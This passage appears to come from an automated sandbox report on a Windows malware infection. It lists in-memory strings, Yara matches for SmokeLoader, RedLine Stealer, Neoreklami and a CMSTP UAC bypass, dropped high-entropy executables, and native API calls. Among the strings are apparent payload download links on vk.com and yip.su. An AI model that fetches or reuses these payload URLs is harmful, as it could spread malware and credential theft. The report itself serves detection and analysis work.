Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/browser_reports?dest=default_reports
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669444172?hash=h9HNKFC3zZA9b76sO7xwyzGneP1GyF1iEy2xZ2jA5y8&dl=d94daMXVZFK5
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzKL04
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TPX72
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQzXn
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsECNfe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGi
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669444172?hash=h9HNKFC3zZA9b76sO7xwyzGneP1GyF1iEy2xZ2jA5y8&dl=d94daMXVZ
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzK
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669807694?hash=Sn8Y90pAESSpLPWQN3oshZSPomEZcURQihWHxCR6EjD&dl=cVTIDd6TP
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669811786?hash=8bhjD7NgoJ7mZZEUFcsdZsXzzoRwkNFDlJU5B89faFX&dl=nQsFZJcLQ
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc5294803_669843349?hash=9zPjskz2rlw4WpxESbjigfNghvMBCG7BIpLthkH7eKs&dl=usJOnLsEC
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc863235369_679548730?hash=VLR7cQ444BmBjXLp6la3lUFGFg05ZJB7nkcmssw9Kvz&dl=1NJlbpp
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.ru
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000024.00000000.1419179675.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000024.00000000.1465540565.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000024.00000000.1373594900.00000000071B1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C57000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://yip.su/RNWPd
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002961000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yip.su/RNWPd.exe
Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.dr	String found in binary or memory: https://yip.su/redirect-

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Writes many files with high entropy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\EXHYoUWbk2EtGfzPiFxOh4fX.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\rCs1RclDFMYQLymrwE3zboPd.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\PkqGBlFfXQGSePxTvCIfv7cw.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\gX97xQ1DxOEiWzmKIb4DOJWg.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JRzNWYaVkGhoqBVKINyNWHZb.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\zl9WjeKTxMy8k8EbTBZdpElC.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\m1SrljFNqYeH3vArtbYAaVjK.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\JEeghWLvEc5NBgQe7cVxX86V.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\Lxz6buRp1tzgPd3mYM1t5mGJ.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\5FLQaCVJzPf4A255tfj9dVCh.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\Pictures\iuDvaF9Di8V3GPfVdVsLOQc6.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe entropy: 7.99633338896	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe.P2P entropy: 7.99475810581	Jump to dropped file
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	File created: C:\Users\user\Pictures\360TS_Setup.exe (copy) entropy: 7.99475810581	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exe entropy: 7.99695778151	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exe entropy: 7.99695778151	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exe entropy: 7.99904461084	Jump to dropped file
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exe entropy: 7.99904461084	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: lgX7lgUL1w.exe, type: SAMPLE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen

PE file contains section with special chars

Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: DYOHZPW0D22LInRRNxYgymyV.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: PBZVagSpvy50LOBQHCjW6qX9.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: JRER40VeoC2Q4ducOjAkB8be.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: 2nhKzHIgDWCzStH9EAQv4dqj.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: oZEH3cHEU5SysFjbUbbRDrah.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: M5ZhHB9e1LKNIZlvmmjrpriI.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: oabRgCI78gjFIFXr0JEwCrFT.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: c12YwoiQ34lE0LgBRkxJOClX.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: xCvbsgibKaoe0JrKdFZUHTO3.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: aqGWEPmkK0B9sJyfEBtpOpuJ.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: 04MMWMll6oQNYP44niQAKG8f.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: VEH3hOo7SH8Curivn14XA2XL.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:
Source: z7qYuSNnmN1T20mVDPQyJKNf.exe.5.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401615 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401615
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401658 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401658
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00403406 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,	8_2_00403406
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_0040340F NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_0040340F
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401620 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401620
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401524
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_0040162D NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_0040162D
